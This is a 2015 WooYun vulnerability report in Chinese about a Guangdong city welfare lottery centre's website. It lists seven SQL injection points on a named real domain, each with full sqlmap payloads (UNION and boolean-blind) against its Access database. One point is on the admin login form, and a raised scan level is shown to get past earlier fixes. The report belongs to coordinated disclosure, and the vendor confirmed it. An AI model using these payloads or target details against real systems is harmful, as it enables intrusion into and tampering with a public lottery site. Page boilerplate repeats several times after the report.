广东省某市福利CAIPIAO发行中心存在多处SQL注入（可绕过）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117421

漏洞标题：广东省某市福利CAIPIAO发行中心存在多处SQL注入（可绕过）

漏洞作者：路人甲

提交时间：2015-06-01 18:28

修复时间：2015-07-17 10:14

公开时间：2015-07-17 10:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-01：细节已通知厂商并且等待厂商处理中
2015-06-02：厂商已经确认，细节仅向厂商公开
2015-06-12：细节向核心白帽子及相关领域专家公开
2015-06-22：细节向普通白帽子公开
2015-07-02：细节向实习白帽子公开
2015-07-17：细节向公众公开

简要描述：

存在多个注入，以前修复的注入可以增加等级绕过！~~~

详细说明：

1、参考
WooYun: 广东省某市福利采彡PIAO发行中心存在SQL注入漏洞(已入后台可后台发布中奖号码)
WooYun: 广东省某市福利采彡PIAO发行中心存在四处SQL注入漏洞
看了这两个，试着看看有没有可以注入的地方
结果找到了，而且增加level 3就可以对修复的继续注入！~~~
2、注入点1

http://www.czfc.org.cn/kjnum_36x7_mx.asp?krs=2006085

3、注入点2

http://www.czfc.org.cn/kjcx_view.asp (POST)
h_key=true&nytypeid=ny36x7&qh=11&kjrq=1111

参数qh和kjrq都存在注入
--level 3

sqlmap identified the following injection points with a total of 4511 HTTP(s) requests:
---
Place: POST
Parameter: qh
    Type: UNION query
    Title: Generic UNION query (32) - 115 columns
    Payload: h_key=true&nytypeid=ny36x7&qh=-2237' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,CHR(113)&CHR(107)&CHR(98)&CHR(109)&CHR(113)&CHR(120)&CHR(73)&CHR(109)&CHR(99)&CHR(118)&CHR(69)&CHR(73)&CHR(78)&CHR(78)&CHR(74)&CHR(113)&CHR(107)&CHR(118)&CHR(117)&CHR(113),32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32 FROM MSysAccessObjects%16&kjrq=1111
Place: POST
Parameter: kjrq
    Type: UNION query
    Title: Generic UNION query (32) - 115 columns
    Payload: h_key=true&nytypeid=ny36x7&qh=11&kjrq=1111' UNION ALL SELECT 32,32,32,CHR(113)&CHR(107)&CHR(98)&CHR(109)&CHR(113)&CHR(102)&CHR(115)&CHR(112)&CHR(110)&CHR(82)&CHR(108)&CHR(99)&CHR(111)&CHR(104)&CHR(74)&CHR(113)&CHR(107)&CHR(118)&CHR(117)&CHR(113),32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32 FROM MSysAccessObjects%16
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access

--level 1

sqlmap identified the following injection points with a total of 646 HTTP(s) requests:
---
Place: POST
Parameter: kjrq
    Type: UNION query
    Title: Generic UNION query (NULL) - 115 columns
    Payload: h_key=true&nytypeid=ny36x7&qh=11&kjrq=1111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(118)&CHR(102)&CHR(104)&CHR(113)&CHR(117)&CHR(104)&CHR(70)&CHR(70)&CHR(109)&CHR(81)&CHR(90)&CHR(106)&CHR(81)&CHR(108)&CHR(113)&CHR(103)&CHR(119)&CHR(112)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
back-end DBMS: Microsoft Access

4、注入点3

http://www.czfc.org.cn/news/news_show.asp?news_id=897

sqlmap identified the following injection points with a total of 209 HTTP(s) requests:
---
Place: GET
Parameter: news_id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original value)
    Payload: news_id=IIF(8293=8293,897,1/0)
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access

5、注入点4

http://www.czfc.org.cn/txxw_contact2.asp?ProductID=2196

sqlmap identified the following injection points with a total of 35 HTTP(s) requests:
---
Place: GET
Parameter: ProductID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ProductID=2196 AND 5522=5522
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: ProductID=-9251 UNION ALL SELECT NULL,NULL,NULL,CHR(113)&CHR(99)&CHR(121)&CHR(97)&CHR(113)&CHR(78)&CHR(120)&CHR(67)&CHR(102)&CHR(113)&CHR(86)&CHR(77)&CHR(82)&CHR(112)&CHR(121)&CHR(113)&CHR(115)&CHR(102)&CHR(99)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access

6、注入点5

http://www.czfc.org.cn/gift_search.asp?action=search (POST)
type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=1&giftNumber=1

--level 1

sqlmap identified the following injection points with a total of 655 HTTP(s) requests:
---
Place: POST
Parameter: qh
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=-1521') UNION ALL SELECT NULL,NULL,NULL,CHR(113)&CHR(121)&CHR(108)&CHR(108)&CHR(113)&CHR(76)&CHR(114)&CHR(114)&CHR(109)&CHR(115)&CHR(78)&CHR(113)&CHR(88)&CHR(78)&CHR(69)&CHR(113)&CHR(111)&CHR(99)&CHR(112)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&giftNumber=1
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access

--level 3

sqlmap identified the following injection points with a total of 2135 HTTP(s) requests:
---
Place: POST
Parameter: startD
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(112)&CHR(67)&CHR(90)&CHR(104)&CHR(119)&CHR(68)&CHR(65)&CHR(113)&CHR(115)&CHR(97)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL FROM MSysAccessObjects%16&endD=2015-5-28&qh=1&giftNumber=1
Place: POST
Parameter: giftNumber
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=1&giftNumber=1')) UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(114)&CHR(112)&CHR(68)&CHR(75)&CHR(104)&CHR(111)&CHR(111)&CHR(106)&CHR(70)&CHR(81)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
Place: POST
Parameter: endD
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(84)&CHR(89)&CHR(104)&CHR(76)&CHR(105)&CHR(73)&CHR(119)&CHR(121)&CHR(83)&CHR(120)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&qh=1&giftNumber=1
Place: POST
Parameter: qh
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=-6420') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(122)&CHR(119)&CHR(104)&CHR(114)&CHR(120)&CHR(90)&CHR(65)&CHR(87)&CHR(70)&CHR(70)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&giftNumber=1
Place: POST
Parameter: type
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(114)&CHR(109)&CHR(73)&CHR(107)&CHR(68)&CHR(86)&CHR(106)&CHR(75)&CHR(84)&CHR(68)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL FROM MSysAccessObjects%16&startD=2009-01-01&endD=2015-5-28&qh=1&giftNumber=1
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access

7、注入点6

http://www.czfc.org.cn/gift_search.asp?pagen=5&startD=&endD=&qh=&giftNumber=&action=search&type=%27%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17%27%2C+%27%BA%C3%B2%CA36%27%2C+%27%C4%CF%D4%C1%B7%E7%B2%CA26%D1%A15%27%2C+%27%BA%C3%B2%CA26%27%2C+%27%CB%AB%C9%AB%C7%F2%27%2C+%27%B8%A3%B2%CA3D%27 (GET)

sqlmap identified the following injection points with a total of 4564 HTTP(s) requests:
---
Place: GET
Parameter: giftNumber
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pagen=5&startD=&endD=&qh=&giftNumber=') AND 3416=3416 AND ('StTz' LIKE 'StTz&action=search&type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17', '%BA%C3%B2%CA36', '%C4%CF%D4%C1%B7%E7%B2%CA26%D1%A15', '%BA%C3%B2%CA26', '%CB%AB%C9%AB%C7%F2', '%B8%A3%B2%CA3D'
Place: GET
Parameter: qh
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pagen=5&startD=&endD=&qh=' AND 4177=4177 AND 'THpF' LIKE 'THpF&giftNumber=&action=search&type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17', '%BA%C3%B2%CA36', '%C4%CF%D4%C1%B7%E7%B2%CA26%D1%A15', '%BA%C3%B2%CA26', '%CB%AB%C9%AB%C7%F2', '%B8%A3%B2%CA3D'
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access

8、注入点7

http://www.czfc.org.cn/displayhtml.asp?act=state (POST)
uid=admin&pwd=123456&CookieDate=0&userhidden=2&comeurl=http://www.czfc.org.cn/flash/menu.swf

sqlmap identified the following injection points with a total of 1127 HTTP(s) requests:
---
Place: POST
Parameter: uid
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: uid=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(105)&CHR(99)&CHR(104)&CHR(113)&CHR(118)&CHR(114)&CHR(80)&CHR(121)&CHR(105)&CHR(75)&CHR(86)&CHR(71)&CHR(110)&CHR(117)&CHR(113)&CHR(121)&CHR(100)&CHR(110)&CHR(113) FROM MSysAccessObjects%16&pwd=123456&CookieDate=0&userhidden=2&comeurl=http://www.czfc.org.cn/flash/menu.swf
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access

9、测试了很多，就不继续了，深入的也被大牛深入后台了！~~~具体什么重要信息就不说了！~~~

漏洞证明：

修复方案：

你们知道的！~~~

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-06-02 10:12

厂商回复：

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据：高
攻击成本：低
造成影响：高
综合评级为：高，rank：10
正在联系相关网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117421

漏洞标题：广东省某市福利CAIPIAO发行中心存在多处SQL注入（可绕过）

相关厂商：广东省信息安全测评中心

漏洞作者：路人甲

提交时间：2015-06-01 18:28

修复时间：2015-07-17 10:14

公开时间：2015-07-17 10:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117421

漏洞标题：广东省某市福利CAIPIAO发行中心存在多处SQL注入（可绕过）

相关厂商：广东省信息安全测评中心

漏洞作者： 路人甲

提交时间：2015-06-01 18:28

修复时间：2015-07-17 10:14

公开时间：2015-07-17 10:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0117421"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云